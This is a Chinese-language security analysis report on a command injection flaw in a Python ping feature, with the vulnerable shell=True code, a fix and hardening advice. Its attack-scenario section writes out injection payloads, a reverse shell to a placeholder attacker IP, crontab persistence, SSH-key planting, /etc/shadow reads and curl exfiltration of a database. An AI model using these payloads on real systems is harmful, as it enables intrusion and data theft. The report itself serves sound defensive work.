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命令注入漏洞安全分析报告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报告日期：2026年7月13日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命令注入（Command Injection）是一种严重的安全漏洞，攻击者通过向服务器提交恶意构造的输入，在系统 Shell 中执行任意命令。本报告详细分析项目 Ping 网络诊断功能中存在的命令注入漏洞、利用方式、危害评估及修复方案。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漏洞描述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Ping 功能接收用户输入的 IP 或域名，通过系统 ping 命令进行网络连通性测试。修复前代码将用户输入直接拼接到命令中并以 shell=True 执行，攻击者可利用Shell 特殊字符注入任意系统命令。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ip = request.form.get("ip", "").strip()</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(cmd, shell=True, timeout=30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 三个叠加风险因素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风险因素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代码表现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导致后果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f-string 拼接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f"ping -c 3 {ip}"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用户输入直接嵌入命令字符串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shell=True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check_output(cmd, shell=True)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字符串交由 Shell 解析执行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无输入校验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无任何过滤或检查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任意特殊字符均可传入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3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 注入符号与利用方式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注入符号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攻击示例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;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命令分隔符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127.0.0.1;whoami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|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管道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127.0.0.1|whoami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&amp;&amp;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条件执行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127.0.0.1&amp;&amp;whoami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||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条件执行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127.0.0.1||whoami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`cmd`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命令替换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127.0.0.1`whoami`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$(cmd)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命令替换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127.0.0.1$(whoami)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&amp;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后台运行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127.0.0.1&amp;whoami&amp;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3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 实际验证结果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输入 127.0.0.1;id 后，服务器返回了以下结果，证明命令注入完全生效：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64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.021ms</w:t>
        <w:br/>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029ms</w:t>
        <w:br/>
        <w:t>64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.031ms</w:t>
        <w:br/>
        <w:t>uid=0(root) gid=0(root) groups=0(root)  ← 来自 ;id 的注入输出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注意：当前服务以 root 权限运行，命令注入可获得服务器最高控制权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>三、攻击场景示例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场景一：信息收集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查看当前用户</w:t>
        <w:br/>
        <w:t>127.0.0.1;whoami</w:t>
        <w:br/>
        <w:br/>
        <w:t># 查看网络连接</w:t>
        <w:br/>
        <w:t>127.0.0.1;netstat -antp</w:t>
        <w:br/>
        <w:br/>
        <w:t># 查看进程列表</w:t>
        <w:br/>
        <w:t>127.0.0.1;ps aux</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取系统密码文件</w:t>
        <w:br/>
        <w:t>127.0.0.1;cat /etc/shadow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场景二：反弹 Shell（最危险）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127.0.0.1;bash -i &gt;&amp; /dev/tcp/攻击者IP/4444 0&gt;&amp;1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攻击者获得完整的交互式 Shell，可以完全控制服务器。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场景三：持久化后门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写入 crontab 定时任务</w:t>
        <w:br/>
        <w:t>127.0.0.1;echo "*/5 * * * * root bash -i &gt;&amp; /dev/tcp/攻IP/5555 0&gt;&amp;1" &gt;&gt; /etc/crontab</w:t>
        <w:br/>
        <w:br/>
        <w:t># 添加 SSH 公钥</w:t>
        <w:br/>
        <w:t>127.0.0.1;echo "攻击者公钥" &gt;&gt; /root/.ssh/authorized_keys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场景四：数据窃取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下载数据库</w:t>
        <w:br/>
        <w:t>127.0.0.1;curl -F "file=@/opt/app/data/users.db" http://攻击者服务器/upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>四、漏洞危害评估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攻击类型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任意命令执行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以 root 权限执行任意系统命令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反弹 Shell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获取服务器完全控制权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敏感文件读取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 /etc/shadow、数据库、SSH 密钥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内网横向移动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以服务器为跳板攻击内网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数据篡改/删除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可删除数据库、源码、日志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五、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 去除 shell=True（核心修复）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使用参数列表形式替代字符串命令，subprocess 不会调用 Shell，所有参数作为独立元素传递给程序，特殊字符不会被解析：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修复前（有漏洞）</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(f"ping -c 3 {ip}", shell=True)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 修复后（安全）</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(["ping", "-c", "3", ip])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参数列表模式下，即使 ip 包含 ; | &amp; 等字符，也只是作为 ping 命令的普通参数传递，不会触发 Shell 解析。这是最根本的防御措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 输入格式校验（辅助防御）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对 IP 和域名进行格式校验，拦截非法字符：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def is_valid_host(hostname):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dangerous_chars = set(";|&amp;`$(){}[]&lt;&gt;!#~\'\\")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if any(c in hostname for c in dangerous_chars):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 验证 IP 地址</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ipaddress.ip_address(hostname)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except ValueError:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        pass</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 验证域名格式</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return bool(re.match(r'^[a-zA-Z0-9][...]*\.[a-zA-Z]{2,}$', hostname))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>六、修复前后对比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 IP 127.0.0.1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 Ping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正常 Ping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正常域名 baidu.com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 Ping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正常 Ping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;id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whoami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|whoami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whoami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&amp;&amp;id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id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$(whoami)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whoami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`whoami`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whoami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命令注入 &amp;id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执行 id 命令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拦截：非法输入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shell=True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字符串经 Shell 解析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参数列表，无 Shell ✅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七、安全建议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永远不要使用 shell=True 执行包含用户输入的命令，应始终使用参数列表形式。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如果必须使用 shell（如需要管道、重定向），请使用 shlex.quote() 转义用户输入。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对所有用户输入做严格的格式校验，拒绝包含 Shell 特殊字符的输入。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遵循最小权限原则，避免以 root 权限运行 Web 服务。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使用沙箱或容器隔离命令执行环境，限制执行后果。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记录所有命令执行日志，便于安全审计和事件追溯。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